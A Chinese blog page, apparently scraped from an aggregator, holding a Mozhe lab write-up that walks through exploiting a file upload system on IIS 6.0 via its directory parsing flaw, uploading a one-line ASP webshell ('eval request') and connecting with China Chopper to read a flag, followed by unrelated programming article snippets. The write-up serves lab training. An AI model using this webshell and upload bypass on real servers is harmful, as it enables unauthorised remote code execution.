当前位置: 首页 > news >正文

墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源

news 2026/5/22 22:29:25

墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源

1.选择合适的文件上传

在这里插入图片描述

2.可以看到为*.asp文件

在这里插入图片描述

3.可以推测出此站点为IIS
4.上传shell.asp试试

在这里插入图片描述

5.上传报错,将其改名为shell.asp.txt上传,发现上传成功

在这里插入图片描述

6.有个问题就是服务器将我们所上传的文件进行了重命名,故我们应该想办法截断

在这里插入图片描述

7.经过测试发现不行,那么查看一下操作系统的版本Microsoft-IIS/6.0
在这里插入图片描述

8.看看此服务器有没有什么漏洞,发现此版本有文件解析漏洞

在这里插入图片描述

9.把文档中的内容替换成一句话木马

<%eval  request(“test”)%>

在这里插入图片描述

10.上传试试

在这里插入图片描述

11.改上传的路径为123.asp,那么此目录下的所有文件就会被当做asp执行

在这里插入图片描述

12.接下来,使用菜刀连接

在这里插入图片描述

13.找到flag

KEY:mozhe8d9d6022cc9ac37e39936699415

在这里插入图片描述

PS:使用菜刀连接,一开始我还以为马儿有问题!!!有点坑

相关文章:

墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源

墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源 1.选择合适的文件上传 2.可以看到为*.asp文件 3.可以推测出此站点为IIS 4.上传shell.asp试试 5.上传报错&#xff0c;将其改名为shell.asp.txt上传&#xff0c;发现上传成功 6.有个问题就是服务器将我们所…...

编程日记 2023/3/16 7:57:05

5.2 Python if语句

5.2.3 检查是否不相等要判断两个值是否不等&#xff0c;可结合使用惊叹号和等号(!)&#xff0c;其中的惊叹号表示不&#xff0c;在很多编程语言中都如此。下面再使用一条if语句来演示如何使用不等运算符。我们将把要求的比萨配料存储在一个变量中&#xff0c;再打印一条消息&am…...

编程日记 2023/3/16 16:13:15

ubuntu gerrit 配置

1 - 简介 参考地址: https://www.cnblogs.com/anliven/p/12019974.html https://www.cnblogs.com/anliven/p/11980432.html 虽然Gerrit 本身提供 Code Review和 Git 仓库的两大功能,但实际上很多项目用的是其他的Git仓库,例如GitLab和GitHub。 一般情况下,Gerrit位于最终…...

编程日记 2023/4/1 3:03:15

运动蓝牙耳机什么牌子好,运动蓝牙耳机品牌推荐

现在市面上运动耳机的品牌越来越多&#xff0c;还不知道选择哪一些运动耳机品牌&#xff0c;可以看看下面的一些耳机分享&#xff0c;运动耳机需要注意耳机的参数配置以及佩戴舒适度&#xff0c;根据自己最根本的使用需求来选择运动耳机。 1、南卡Runner Pro4骨传导蓝牙运动耳…...

编程日记 2023/4/1 3:05:07

(7)C#传智:方法及参数、重载(第7天)

一、方法作用域 被调用者需要调用者的值,方法有二: 1.传参数. private static void Main(string[] args){int m 3;Console.WriteLine(m);Console.ReadKey();}public static int GetMax(int m){return m 3;} 2.使用静态字段模拟全局. 多个方法都需要时&#x…...

编程日记 2023/3/21 11:34:58

Python 函数式编程

函数式编程&#xff1a;允许把函数本身作为参数传入另一个函数&#xff0c;还允许返回一个函数&#xff01; 1.高阶函数 一个函数可以接收另一个函数作为参数&#xff0c;这种函数称之为高阶函数 abs(-10) 是函数调用 abs是函数本身 abs函数名其实是一个变量名 变量可以…...

编程日记 2023/3/15 12:49:37

pandas读取EXCEL列名重复问题解决——pandas设置多行为列名(多层列名)

问题呈现 这是我在问答区看到的一个问题。 问&#xff1a;在python中使用pandas读取Excel数据&#xff0c;重复数据被区分了&#xff0c;如何做到重复数据不被区分&#xff1f; 解决思路 很明显&#xff0c;这是pandas读取excel文件时列名设置问题&#xff0c;我第一时间想…...

编程日记 2023/3/20 11:15:55

CMake常用语法

1. cmake_minimum_required(VERSION 3.4.1) 指定需要的最小的cmake版本 2. aux_source_directory 查找源文件并保存到相应的变量中: #查找当前目录下所有源文件并保存至SRC_LIST变量中 aux_source_directory(. SRC_LIST)3. add_library 3.1 添加一个库 add_library(<n…...

编程日记 2023/3/22 15:24:12

Java知识复习(一)基础知识

1、什么是JVM、JDK和JRE&#xff1f; JVM是指运行Java字节码的虚拟机。而字节码文件指的就是扩展名为.class的文件&#xff0c;JDK指功能齐全的Java SDK&#xff0c;能够创建和编译程序JRE指Java运行的环境&#xff0c;包括JVM、类库和命令等 2、重载和重写的主要区别 重载&…...

编程日记 2023/3/15 12:51:47

springboot+vue.js校园车辆用车预约管理系统

springboot是基于spring的快速开发框架, 相比于原生的spring而言, 它通过大量的java config来避免了大量的xml文件, 只需要简单的生成器便能生成一个可以运行的javaweb项目, 是目前最火热的java开发框架 前端技术&#xff1a;nodejsvueelementui本项目的应用场景描述如下&…...

编程日记 2023/3/17 22:06:11

【 K8s 源码之调度学习】Pod 间亲和性和反亲和性的源码分析

查看案例 字段含义podAffinityPod 间的亲和性定义podAntiAffinityPod 间的反亲和性定义requiredDuringSchedulingIgnoredDuringExecution硬性要求&#xff0c;必须满足条件&#xff0c;保证分散部署的效果最好使用用此方式preferredDuringSchedulingIgnoredDuringExecution软性…...

编程日记 2023/3/22 15:26:52

计及绿证交易及碳排放的含智能楼宇微网优化调度(Matlab代码实现)

&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️&#x1f4a5;&#x1f4a5; &#x1f3c6;博主优势&#xff1a;&#x1f31e;&#x1f31e;&#x1f31e;博客内容尽量做到思维缜密&#xff0c;逻辑清晰&#xff0c;为了方便读者。 ⛳️座右铭&a…...

编程日记 2023/3/15 12:52:51

场景扩展,体验升级 | DBMotion新增无公网数据库迁移、支持监控报警等多项功能

丝滑的零停机数据库在线迁移工具——DBMotion&#xff0c;又双叒叕发新版&#xff1a;新增的网关、数据源功能&#xff0c;让你无公网IP的数据库也可以迁移&#xff1b;新增的监控功能&#xff0c;让你对迁移性能一目了然&#xff1b;新增的报警功能&#xff0c;让你及时获得同…...

编程日记 2023/4/1 3:05:23

【正点原子FPGA连载】第十五章eMMC读写测试实验 摘自【正点原子】DFZU2EG_4EV MPSoC之嵌入式Vitis开发指南

1&#xff09;实验平台&#xff1a;正点原子MPSoC开发板 2&#xff09;平台购买地址&#xff1a;https://detail.tmall.com/item.htm?id692450874670 3&#xff09;全套实验源码手册视频下载地址&#xff1a; http://www.openedv.com/thread-340252-1-1.html 第十五章eMMC读写…...

编程日记 2023/4/3 3:19:56

i2c子系统

i2c 硬件协议 Linux 应用层读写i2c 数据 在Linux系统上&#xff0c;不仅可以在内核中使用 i2c 总线发送、接收数据&#xff0c;同时也支持应用层使用i2c 总线发送、接收。 如果在内核中使能了drivers/i2c/i2c-dev.c 配置&#xff0c;内核就会为每一个i2c 控制器生成一个/dev/…...

编程日记 2023/4/1 3:06:51

【K3s】第17篇 Helm版本和支持的Kubernetes版本对照表

目录 Helm版本和支持的Kubernetes版本对照表 Helm版本和支持的Kubernetes版本对照表 描述了在Helm和Kubernetes之间支持的最大版本偏差。 Helm的版本用 x.y.z 描述&#xff0c;x是主版本&#xff0c;y是次版本&#xff0c;z是补丁版本。 当一个Helm的新版本发布时&#xff0…...

编程日记 2023/3/19 12:12:36

如何自己搭建一个ai画图系统? 从0开始云服务器部署novelai

如何自己搭建一个ai画图系统&#xff1f; 从0开始云服务器部署novelai ​ 上面两张图都是通过ai生成的&#xff0c;是不是有以假乱真的感觉。 本教程提供的是自己搭建一个可以外网访问的ai系统的方法&#xff0c;需要采购gpu服务器&#xff08;后续会出白嫖的方式&#xff09;&…...

编程日记 2023/4/1 3:09:32

SpringSecurity过滤请求导致的系统bug

背景 今天开发一个新的会员管理系统&#xff0c;继承了SpringSecurity的&#xff0c;用以控制权限。结果无论怎么配置&#xff0c;都会报错&#xff1a;An Authentication object was not found in the SecurityContext 这句话的意思很明确&#xff1a;指的就是在SecurityCon…...

编程日记 2023/3/22 15:30:00

css\js\vue知识点

1.css3新特性 css3新特性 1&#xff09;选择器 2&#xff09;阴影 3&#xff09;形状转换&#xff08;2D <-> 3D&#xff09; 4&#xff09;变形 5&#xff09;动画&#xff08;过渡动画、帧动画&#xff09; 6&#xff09;边框 7&#xff09;多重背景 8&#xff09;反…...

编程日记 2023/3/15 13:05:43

在vue项目中使用video.js实现视频播放和视频进度条打点

一、用video.js实现视频播放 1、安装video.js插件 // 安装video.js插件 npm install video.js -S // 如果需要播放rtmp直播流&#xff0c;需安装一下插件 npm install videojs-flash -S 2、在组件代码里使用 <template><div data-vjs-player><video ref&quo…...

编程日记 2023/3/17 6:32:03

为什么92%的团队仍在手写API文档?ChatGPT驱动的智能生成方案已上线,你还在等什么?

更多请点击&#xff1a; https://kaifayun.com 第一章&#xff1a;API文档手写困局的根源与行业现状 在现代微服务与云原生架构普及的背景下&#xff0c;API已成为系统间协作的核心契约。然而&#xff0c;大量团队仍依赖人工编写和维护 OpenAPI&#xff08;Swagger&#xff0…...

编程新知 2026/5/22 21:59:32

JMeter+DeepSeek实现性能测试报告自动化与智能脚本生成

1. 这不是“AI写报告”&#xff0c;而是把性能测试工程师从重复劳动里解放出来的实操路径 你有没有过这样的经历&#xff1a;凌晨两点还在手动整理JMeter的.jtl结果文件&#xff0c;Excel里堆着几十列响应时间、错误率、吞吐量&#xff0c;再复制粘贴到Word里写“本次压测在200…...

编程新知 2026/5/22 21:13:03

深信服发布AI算力网关,聚焦AI算力治理,让AI算力效能更高

中国AI产业正在全面爆发&#xff0c;各行业的Agent应用发展更是迅猛。对企业来说&#xff0c;管好这些Agent并不容易&#xff0c;首先难算清的就是“成本账”——算力使用情况看不清、Token资源浪费管不住、AI投入省不下。为了帮助各行业用户实现AI模型和算力的高效治理&#x…...

编程新知 2026/5/22 20:08:35

量子近似优化算法(QAOA)原理与实践指南

1. 量子近似优化算法(QAOA)基础解析 量子近似优化算法(QAOA)是近年来量子计算领域最具应用前景的混合算法之一。作为一名长期从事量子算法研究的工程师&#xff0c;我见证了QAOA从理论构想到实际应用的完整发展历程。这种算法巧妙地将经典优化技术与量子线路相结合&#xff0c;…...

编程新知 2026/5/22 19:18:31

欢迎使用Marp for VS Code

欢迎使用Marp for VS Code 【免费下载链接】marp-vscode Marp for VS Code: Create slide deck written in Marp Markdown on VS Code 项目地址: https://gitcode.com/gh_mirrors/ma/marp-vscode 用Markdown制作专业演示文稿 简洁的语法实时预览多格式导出 ### 第四步&…...

编程新知 2026/5/22 18:15:52

【DeepSeek架构演进倒计时】:K8s 1.30+废弃Dockershim后,容器运行时迁移至containerd+Podman的6小时无感切换方案

更多请点击&#xff1a; https://intelliparadigm.com 第一章&#xff1a;DeepSeek微服务架构演进的背景与战略意义 随着DeepSeek大模型训练规模持续扩大、推理服务调用量激增&#xff0c;单体架构在弹性伸缩、故障隔离、团队协作和灰度发布等方面日益暴露出瓶颈。传统单体服务…...

编程新知 2026/5/22 16:19:33

怎样快速去掉照片背景?2026年AI抠图工具实测对比与使用指南

还在为复杂的照片背景发愁&#xff1f;想要快速批量处理多张照片&#xff1f;本文将带你深入了解2026年最新的照片去背景方法&#xff0c;从零基础的在线工具到专业级别的桌面软件&#xff0c;再到智能AI抠图方案&#xff0c;帮你找到最适合自己的解决方案。快速去背景的核心方…...

编程新知 2026/5/22 16:10:38

百度GEO优化是什么意思

这是很多国内企业主都会问的问题。因为在大多数人的认知中&#xff0c;“搜索百度”&#xff0c;所以一提到GEO&#xff0c;自然联想到百度。百度GEO优化&#xff0c;指的是在百度搜索引擎及其AI生态产品中&#xff0c;围绕百度AI生成的答案模块进行的品牌可见性优化。这包含两…...

编程新知 2026/5/22 14:34:01

如何轻松实现U校园智能刷课?这个Python工具让你5分钟搞定

如何轻松实现U校园智能刷课&#xff1f;这个Python工具让你5分钟搞定 【免费下载链接】AutoUnipus U校园脚本,支持全自动答题,百分百正确 2024最新版 项目地址: https://gitcode.com/gh_mirrors/au/AutoUnipus 还在为U校园网课的手动答题烦恼吗&#xff1f;AutoUnipus这…...

编程新知 2026/5/22 14:25:05

双翌精翌亮相工业软件产业协同对接交流会,共筑国产精密测量新生态

本次交流会以“同心聚链、智造共赢”为主题&#xff0c;汇聚了来自全国各地的工业软件开发商、高端装备制造商、系统集成商以及行业专家&#xff0c;围绕工业软件国产化替代、软硬件协同适配、产业生态共建等核心议题展开深入探讨。在国家信创战略加速推进的大背景下&#xff0…...

编程新知 2026/5/22 12:49:38